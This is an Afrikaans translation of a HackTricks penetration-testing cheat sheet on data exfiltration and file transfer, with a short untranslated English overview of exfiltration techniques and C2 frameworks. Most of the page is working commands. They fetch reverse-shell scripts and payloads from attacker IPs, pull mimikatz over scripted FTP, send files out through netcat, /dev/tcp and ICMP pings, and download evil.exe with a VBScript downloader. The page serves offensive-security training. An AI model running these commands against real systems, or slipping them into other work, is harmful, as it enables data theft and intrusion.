hacktricks/generic-methodologies-and-resources/exfiltration.md

Uitlekking

{% hint style="success" %} Leer & oefen AWS Hack:HackTricks Opleiding AWS Red Team Expert (ARTE)
Leer & oefen GCP Hack: HackTricks Opleiding GCP Red Team Expert (GRTE)

Ondersteun HackTricks

• Controleer die inskrywingsplanne!
• Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @hacktricks_live.
• Deel hacktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.

{% endhint %}

Probeer Hard Security Groep

{% embed url="https://discord.gg/tryhardsecurity" %}

---

Gewoonlik toegelate domeine om inligting uit te lek

Kyk na https://lots-project.com/ om gewoonlik toegelate domeine te vind wat misbruik kan word

Kopieer & Plak Base64

Linux

base64 -w0 <file> #Encode file
base64 -d file #Decode file

Windows

certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll

HTTP

Linux

wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
fetch 10.10.14.14:8000/shell.py #FreeBSD

Windows

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf

#PS
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"

Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
#OR
Start-BitsTransfer -Source $url -Destination $output -Asynchronous

Laai lêers op

• SimpleHttpServerWithFileUploads
• SimpleHttpServer printing GET and POSTs (also headers)
• Python module uploadserver:

# Listen to files
python3 -m pip install --user uploadserver
python3 -m uploadserver
# With basic auth:
# python3 -m uploadserver --basic-auth hello:world

# Send a file
curl -X POST http://HOST/upload -H -F 'files=@file.txt'
# With basic auth:
# curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world

HTTPS-bediener

# from https://gist.github.com/dergachev/7028596
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
#    openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
#    python simple-https-server.py
# then in your browser, visit:
#    https://localhost:443

### PYTHON 2
import BaseHTTPServer, SimpleHTTPServer
import ssl

httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever()
###

### PYTHON3
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

httpd = HTTPServer(('0.0.0.0', 443), BaseHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="./server.pem", server_side=True)
httpd.serve_forever()
###

### USING FLASK
from flask import Flask, redirect, request
from urllib.parse import quote
app = Flask(__name__)
@app.route('/')
def root():
print(request.get_json())
return "OK"
if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
###

FTP

FTP-bediener (python)

pip3 install pyftpdlib
python3 -m pyftpdlib -p 21

FTP-bediener (NodeJS)

sudo npm install -g ftp-srv --save
ftp-srv ftp://0.0.0.0:9876 --root /tmp

FTP-bediener (pure-ftp)

apt-get update && apt-get install pure-ftp

#Run the following script to configure the FTP server
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pwd useradd fusr -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart

Windows kliënt

#Work well with python. With pure-ftp use fusr:ftp
echo open 10.11.0.41 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo bin >> ftp.txt
echo GET mimikatz.exe >> ftp.txt
echo bye >> ftp.txt
ftp -n -v -s:ftp.txt

SMB

Kali as bediener

kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
#For new Win10 versions
impacket-smbserver -smb2support -user test -password test test `pwd`

Of skep 'n smb-aandeel met behulp van samba:

apt-get install samba
mkdir /tmp/smb
chmod 777 /tmp/smb
#Add to the end of /etc/samba/smb.conf this:
[public]
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes
#Start samba
service smbd restart

Exfiltration

Exfiltration Techniques

Exfiltration techniques are ways to steal data from a target system. These techniques can be categorized into several groups based on how the data is transferred from the target system to the attacker's system. Some common exfiltration techniques include:

• Exfiltration Over Command and Control (C2) Channel: Attackers can use a C2 channel to send data from the target system to their command and control server. This can be done using various protocols such as HTTP, DNS, or custom protocols.

• Exfiltration Over Alternative Protocols: Attackers can use alternative protocols such as ICMP, SSH, or even social media platforms to exfiltrate data from the target system. This can help bypass network security controls that monitor traditional network traffic.

• Exfiltration Over Encrypted Channels: Attackers can use encrypted channels such as SSL/TLS to hide exfiltrated data within legitimate network traffic. This can evade detection by security tools that do not inspect encrypted traffic.

• Exfiltration Using Steganography: Attackers can embed data within files, images, or other media using steganography techniques. This hidden data can then be extracted by the attacker without arousing suspicion.

• Exfiltration Over DNS: Attackers can abuse the DNS protocol to exfiltrate data by encoding it within DNS queries or responses. This can bypass firewalls that allow DNS traffic outbound.

Exfiltration Tools

There are several tools available to facilitate data exfiltration during a penetration test. These tools can automate the exfiltration process and help testers determine the effectiveness of security controls implemented by the target organization. Some common exfiltration tools include:

• Cobalt Strike: A popular framework for adversary simulations and red team operations that includes features for exfiltration.

• Empire: An open-source post-exploitation framework that includes modules for data exfiltration.

• PowerShell Empire: A post-exploitation framework that leverages PowerShell for exfiltration and persistence.

• Sliver: A cross-platform implant that includes features for exfiltration and persistence.

• SILENTTRINITY: An open-source post-exploitation framework that supports exfiltration capabilities.

By leveraging these tools and techniques, attackers can successfully exfiltrate data from target systems without being detected.

CMD-Wind> \\10.10.14.14\path\to\exe
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials

WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
WindPS-2> cd new_disk:

SCP

Die aanvaller moet SSHd aan die gang hê.

scp <username>@<Attacker_IP>:<directory>/<filename>

SSHFS

Indien die slagoffer SSH het, kan die aanvaller 'n gids van die slagoffer na die aanvaller se stelsel koppel.

sudo apt-get install sshfs
sudo mkdir /mnt/sshfs
sudo sshfs -o allow_other,default_permissions <Target username>@<Target IP address>:<Full path to folder>/ /mnt/sshfs/

NC

Netcat is 'n kragtige netwerk hulpmiddel wat gebruik kan word vir die oordrag van data oor netwerke. Dit kan gebruik word vir die skep van terugvoerlêers, portskandering, en selfs as 'n eenvoudige webbediener.

nc -lvnp 4444 > new_file
nc -vn <IP> 4444 < exfil_file

/dev/tcp

Laai lêer af van slagoffer

nc -lvnp 80 > file #Inside attacker
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim

Laai lêer na slagoffer op

nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
# Inside victim
exec 6< /dev/tcp/10.10.10.10/4444
cat <&6 > file.txt

dankie aan @BinaryShadow_

ICMP

# To exfiltrate the content of a file via pings you can do:
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
#This will 4bytes per ping packet (you could probably increase this until 16)

from scapy.all import *
#This is ippsec receiver created in the HTB machine Mischief
def process_packet(pkt):
if pkt.haslayer(ICMP):
if pkt[ICMP].type == 0:
data = pkt[ICMP].load[-4:] #Read the 4bytes interesting
print(f"{data.decode('utf-8')}", flush=True, end="")

sniff(iface="tun0", prn=process_packet)

SMTP

As jy data na 'n SMTP-bediener kan stuur, kan jy 'n SMTP skep om die data met Python te ontvang:

sudo python -m smtpd -n -c DebuggingServer :25

TFTP

Standaard in XP en 2003 (in ander moet dit uitdruklik tydens installasie bygevoeg word)

In Kali, begin TFTP-bediener:

#I didn't get this options working and I prefer the python option
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /path/tp/nc.exe /tftp

TFTP-bediener in Python:

pip install ptftpd
ptftpd -p 69 tap0 . # ptftp -p <PORT> <IFACE> <FOLDER>

In slagoffer, verbind met die Kali-bediener:

tftp -i <KALI-IP> get nc.exe

PHP

Laai 'n lêer af met 'n PHP eenlynstuk:

echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php

VBScript

Attacker> python -m SimpleHTTPServer 80

Slagoffer

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http =CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

cscript wget.vbs http://10.11.0.5/evil.exe evil.exe

Debug.exe

Die debug.exe program bied nie net die vermoë om binêre lêers te inspekteer nie, maar het ook die vermoë om hulle vanaf heks te herbou. Dit beteken dat deur 'n heks van 'n binêre lêer te voorsien, kan debug.exe die binêre lêer genereer. Dit is egter belangrik om daarop te let dat debug.exe 'n beperking het om lêers tot 64 kb in grootte saam te stel.

# Reduce the size
upx -9 nc.exe
wine exe2bat.exe nc.exe nc.txt

Dan kopieer en plak die teks in die Windows-skootrekenaar en 'n lêer genaamd nc.exe sal geskep word.

• https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html

DNS

• https://github.com/62726164/dns-exfil

Try Hard Security Group

{% embed url="https://discord.gg/tryhardsecurity" %}

{% hint style="success" %} Leer & oefen AWS-hacking:HackTricks Opleiding AWS Red Team Expert (ARTE)
Leer & oefen GCP-hacking: HackTricks Opleiding GCP Red Team Expert (GRTE)

Ondersteun HackTricks

• Kontroleer die inskrywingsplanne!
• Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @hacktricks_live.
• Deel hacktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.

{% endhint %}